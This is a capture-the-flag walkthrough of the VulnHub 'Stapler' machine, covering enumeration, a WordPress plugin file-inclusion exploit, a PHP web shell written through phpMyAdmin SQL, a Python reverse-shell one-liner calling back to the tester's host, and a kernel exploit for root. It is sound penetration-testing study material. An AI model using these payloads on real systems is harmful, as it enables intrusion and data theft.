Stapler VM – Walkthrough

Hi Friends,

Today we will see how to crack Stapler – vulnerable machine, that is available in vulnhub Here.

I will start with discovering the IP of vulnerable machine, using netdiscover

Netdiscover -r 192.168.10.1/24

I found that Stapler is running on IP 192.168.10.10

Information Gathering:

I used NMAP, Nikto and WPScan

Nmap -sS -A -p- 192.168.10.10

Found Port 21 – FTP is open and Anonymous login is allowed

Port 80 is open, I tried open http://192.168.10.10 in browser, got nothing

So tried FTP with Anonymous login, with username Anonymous and Password Anonymous

Logged in successfully and found file called note

Download the note,

ftp> get note

Once again checked nmap result for open ports and found port 12380 is open and Apache service is running

Now run NIKTO scanner on 192.168.10.10:12380

Found fruitful information like

  • The IP is having SSL, means running on https
  • /admin112233/
  • /blogblog/

Tried access https://192.168.10.10:12380/admin112233/, ohhh

Tried access https://192.168.10.10:12380/blogblog/,

It is a blog, look for web page view-source and found it is running on WordPress

So I ran wordpress scanner I.e., wpscan on URL

Wpscan –url https://192.168.10.10:12380/blogblog/ –enumerate uap –disable-tls-checks

Found directory listing is available for plugins folder

Found advanced-video-embed plugin and searched for exploit from exploit-db.com, found https://www.exploit-db.com/exploits/39646/ LFI exploit

This exploit is to get Configuration file of wordpress i.e., wp-config.php

I run the exploit by updating URL but it is throwing errors and I updated some of python code like added

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

Now successfully run the exploit and browse https://192.168.10.10:12380/blogblog/wp-content/uploads/

We can see a jpeg file has been created

Open the file text format

And we got configuration details

Now browse https://192.168.10.10:12380/phpmyadmin/ and enter username and password

We got full access to phpmyadmin. We will upload shell using sql

SELECT “<?php echo shell_exec($_GET[‘cmd’]); ?>” INTO OUTFILE “/var/www/https/blogblog/wp-content/uploads/shell.php”

browse https://192.168.10.10:12380/blogblog/wp-content/uploads/

Successfully created shell.php, execute commands like IFCONFIG

Now it’s time to take shell, thanks to pentestmonkey

python%20-c%20’import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.10.3”,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

I created URL and browse

https://192.168.10.10:12380/blogblog/wp-content/uploads/cmd.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.3%22,1234));%20os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);

Start netcat in kali linux to get shell

Privilege Escalation

I am not the root for this VM I need to do privilege escalation to get root permissions, we know that vm is running on UBUNTU 16.04, search for exploit

https://www.exploit-db.com/exploits/39772/

Got flag.txt 🙂

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *

three × two =